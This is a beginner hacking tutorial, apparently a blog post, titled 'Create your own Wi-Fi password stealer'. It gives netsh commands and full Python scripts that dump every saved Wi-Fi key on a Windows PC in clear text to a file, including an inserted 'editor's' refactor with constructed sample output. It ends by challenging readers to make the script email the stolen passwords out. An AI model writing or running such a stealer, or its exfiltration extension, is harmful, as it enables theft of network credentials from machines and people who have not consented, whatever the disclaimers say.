Create your own Wi-Fi password stealer

(Day 1) Level-Beginner

6 min read

In this tutorial I'm going to show you how to write a simple Python script that dumps the saved passwords for every Wi-Fi profile on a Windows computer. Reading the keys straight out of the profile store saves a lot of time and effort compared with brute forcing the network.

So, before we start I want to stress a few things. First, everything I'm doing here is happening on my local network. Do not do anything that can get you into trouble. Be an ethical hacker. In this example everything is being done on my personal laptop. I own all the networks that I'm going to demonstrate here. I'm not trying to connect to someone else's network or hack them.

All of these networks are test networks that I'm using to demonstrate the power of Python and the power of knowing a little bit of coding as a pentester or hacker. Second, don't be a script kiddie: try to write your own applications and get your hacking tools to do what you want them to do, and if there isn't a hacking tool that does what you want, create your own. Finally, I assume you have basic Python knowledge; if not, there are a few YouTube channels to get you started with Python. Below is my recommendation.

CoreyMs Youtube Channel

That's it for the introduction, let's now jump right into the part we want.

Manually finding Passwords using Windows Command Prompt

Before we jump into the coding part, I want to show you how you can find saved Wi-Fi passwords on a PC using the Windows command prompt. To list every Wi-Fi profile (saved network) on the machine, issue the following command:

netsh wlan show profiles

This will show all the saved Wi-Fi networks on the PC. To see the details of a specific profile or network, including its password (the juicy part we want), issue the following command, quoting the name if it contains spaces:

netsh wlan show profile name="<profile_name_here>" key=clear

By using this command I was able to retrieve the password of that specific ssid/profile/wifi name: it appears on the Key Content line under Security settings. One caveat: as a rule netsh only discloses Key Content to an account with local administrator rights, so if that line is missing for a network you know is protected, rerun the command as an administrator. Now let's use Python to automate this process, because we don't want to repeat the same command for every network. We also only want the network name and password, not all the other information we are not interested in.

Automate the process With Python

# allows us to run system commands
import subprocess

# import the re module, allows us to use regular expressions
import re

In the above code we imported the subprocess and re modules. The subprocess module lets us run system commands through the functions it provides; this tutorial will use its run function. The regular expression module (re) lets us search for a specific pattern in a string. The call we'll use has the shape:

subprocess.run(args, capture_output=True)

where args is the command and its arguments given as a list.

Let's continue with our code

# run the (netsh wlan show profiles) command and capture its output into a variable
# netsh writes in the console code page, so decode leniently rather than crash on a non-ASCII SSID
command_output = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output=True).stdout.decode(errors="replace")

In the above code we use subprocess.run to run the command given as a list in its first argument. We then pass capture_output=True as the second argument so that whatever the command sends to the standard output stream (the terminal screen) is saved instead of printed. That output is stored in the stdout attribute as bytes and has to be decoded before it can be used as a string in Python. We then saved the decoded output in the variable command_output. The output we store in the variable looks like this:

Note: this might not be the same as yours

Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>


User profiles
-------------
    All User Profile     : Jecha ZOL_LTE
    All User Profile     : DIRECT-AK-HYPE-PdaNet
    All User Profile     : Waiting.....
    All User Profile     : 0x

Profiles on interface Wi-Fi 2:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Not for free
    All User Profile     : Waiting.....
    All User Profile     : NACHI
    All User Profile     : Jecha ZOL_LTE
    All User Profile     : DIRECT-AK-HYPE-PdaNet
    All User Profile     : TSANGA
    All User Profile     : 0x
    All User Profile     : BaTX-QnJhZGxleQ
    All User Profile     : BTjw-U01KMTA1Rg
    All User Profile     : NHEPA

From the output, we are only interested in the profile/ssid/wi-fi-names. So we will use regular expressions to get the part we want from the output.

# using regular expressions to grep the string we want from the above command output and save it into a variable
profile_names = set(re.findall(r"All User Profile\s*:(.*)", command_output))

Here we used the re.findall method to find all the Wi-Fi networks, which are listed after All User Profile (check the output above). This method returns a list of all the matches found; we convert that list to a set to remove duplicates and finally save it in the variable profile_names.

Note: it is possible to encounter duplicate ssids/profiles/wifi names if you are using multiple wireless cards, as you can see from the output above.

Now let's code the last part of the program

# this will store the wifi ssids and their corresponding password (ssid: password)
wifi_data = ""

# iterate through the profile names
for profile in profile_names:

    # remove leading/trailing whitespace and newline characters
    profile = profile.strip()

    # show the profile details together with the clear text password
    # (the name is its own list element, so subprocess quotes names that contain spaces)
    profile_info = subprocess.run(["netsh", "wlan", "show", "profile", profile, "key=clear"], capture_output=True).stdout.decode(errors="replace")

    # use regular expressions to search for the password
    profile_password = re.findall(r"Key Content\s*:(.*)", profile_info)

    # check to see if the profile has a password
    if len(profile_password) == 0:
        wifi_data += f"{profile}: Open\n"
    else:
        wifi_data += f"{profile}: {profile_password[0].strip()}\n"

# save the wifi details in a file
with open("wifis.txt", "w") as file:
    file.write(wifi_data)

Now let's go through the above code step by step.

We first created a variable wifi_data to store network names (ssids) and their corresponding passwords. We then begin a for loop that iterates through each profile and removes any leading or trailing whitespace and newline characters using the strip function. After that, we execute the command that shows the specified ssid/profile together with its password using subprocess.run and store the output in the variable profile_info.

Next, we use re.findall to look for the Key Content line in profile_info and store the result in profile_password. Then we check whether the profile has a password: if it doesn't, we append profile name: Open to wifi_data, otherwise we append the profile name and the password. Keep in mind that an empty result does not always mean an open network; it is also what you get when netsh withholds the key from a non-administrator account.

Finally, we write the contents of wifi_data to the file wifis.txt.
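Here is the whole procedure again as an added example (editor's code, not the article's script or the linked complete code), written so the parsing is separate from the netsh calls and can be tested offline. The netsh outputs embedded in it are constructed, not captured from a real machine. It assumes that netsh labels per-user profiles as "Current User Profile" alongside "All User Profile", that a "Security key : Present" line with no "Key Content" line means netsh withheld the key rather than that the network is open, and that the Windows-only "oem" codec matches the console code page netsh writes in. The helper names run_netsh, fake_netsh, classify and collect are the editor's own.

```python
"""Saved Wi-Fi keys via netsh, with parsing kept separate from the netsh calls so it runs offline."""
import os
import re
import subprocess
from typing import Callable, Dict, List

# Machine-wide profiles are listed as "All User Profile", per-user ones as
# "Current User Profile" (assumption); accept both and drop trailing whitespace.
PROFILE_RE = re.compile(r"^\s*(?:All|Current) User Profile\s*:\s*(.*?)\s*$", re.M)
KEY_RE = re.compile(r"^\s*Key Content\s*:\s*(.*?)\s*$", re.M)
KEY_PRESENT_RE = re.compile(r"^\s*Security key\s*:\s*Present\s*$", re.M)

# Constructed sample output (not captured from a real machine) shaped like
# "netsh wlan show profiles"; the repeated name mimics a second adapter.
SAMPLE_LISTING = """
Profiles on interface Wi-Fi:

User profiles
-------------
    All User Profile     : Jecha ZOL_LTE
    All User Profile     : Not for free
    Current User Profile : TSANGA
    All User Profile     : Jecha ZOL_LTE
"""

# Constructed "show profile <name> key=clear" security sections: a WPA2
# network with its key disclosed, an open network, and a protected network
# whose key netsh withheld (no Key Content line).
SAMPLE_INFO = {
    "Jecha ZOL_LTE": "    Authentication : WPA2-Personal\n"
                     "    Security key   : Present\n"
                     "    Key Content    : hunter2\n",
    "Not for free": "    Authentication : Open\n"
                    "    Security key   : Absent\n",
    "TSANGA": "    Authentication : WPA2-Personal\n"
              "    Security key   : Present\n",
}


def parse_profile_names(listing: str) -> List[str]:
    """Unique profile names from a 'show profiles' listing, in order of appearance."""
    names: List[str] = []
    for match in PROFILE_RE.finditer(listing):
        name = match.group(1)
        if name and name not in names:
            names.append(name)
    return names


def classify(profile_info: str) -> str:
    """Clear-text key, 'Open', or a marker when netsh withheld the key."""
    key = KEY_RE.search(profile_info)
    if key:
        return key.group(1)
    if KEY_PRESENT_RE.search(profile_info):
        # Protected network but no Key Content (typically a non-administrator
        # account): don't mislabel it as open the way a bare findall check would.
        return "<key present but not disclosed>"
    return "Open"


def run_netsh(args: List[str]) -> str:
    """Run a netsh command and return its stdout as text."""
    # netsh writes in the console (OEM) code page rather than UTF-8; the "oem"
    # codec only exists on Windows, so fall back to UTF-8 elsewhere.
    encoding = "oem" if os.name == "nt" else "utf-8"
    return subprocess.run(args, capture_output=True).stdout.decode(encoding, errors="replace")


def fake_netsh(args: List[str]) -> str:
    """Stand-in for run_netsh that answers from the constructed samples."""
    if args[:4] == ["netsh", "wlan", "show", "profiles"]:
        return SAMPLE_LISTING
    return SAMPLE_INFO[args[4]]


def collect(run: Callable[[List[str]], str] = run_netsh) -> Dict[str, str]:
    """Map every saved profile name to its key or status."""
    names = parse_profile_names(run(["netsh", "wlan", "show", "profiles"]))
    # The name travels as its own argv element, so subprocess quotes names with spaces.
    return {n: classify(run(["netsh", "wlan", "show", "profile", n, "key=clear"])) for n in names}


def format_report(data: Dict[str, str]) -> str:
    """One 'name: key' line per profile, the same shape as wifis.txt above."""
    return "".join(f"{name}: {key}\n" for name, key in data.items())


if __name__ == "__main__":
    # netsh only exists on Windows; elsewhere exercise the parser on the samples.
    report = format_report(collect(run_netsh if os.name == "nt" else fake_netsh))
    with open("wifis.txt", "w", encoding="utf-8") as fh:
        fh.write(report)
    print(report, end="")
```

Because collect takes the command runner as a parameter, you can swap in fake_netsh to check the regexes against the constructed listing before running it for real; on Windows the default runner calls netsh, and the third sample shows why a protected network with no Key Content line should be reported as withheld rather than as Open.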

Now here is your challenge/task:

  • improve the script to be able to send the wi-fi passwords back to your email, you can tweet me with your code or join our telegram chatroom

Complete code: wifi password stealer

Pretty cool, we're done! Congrats if you have reached this far

If you have an query or question feel free to dm me @xtremepentest.

Suggestions are welcome, feel free to give me your suggestions and opinions @xtremepentest or in the comment section below.

DISCLAIMER: Use this attack on a machine that you have permission to test, otherwise we are not responsible for any harm you do to anyone.

Happy Hacking
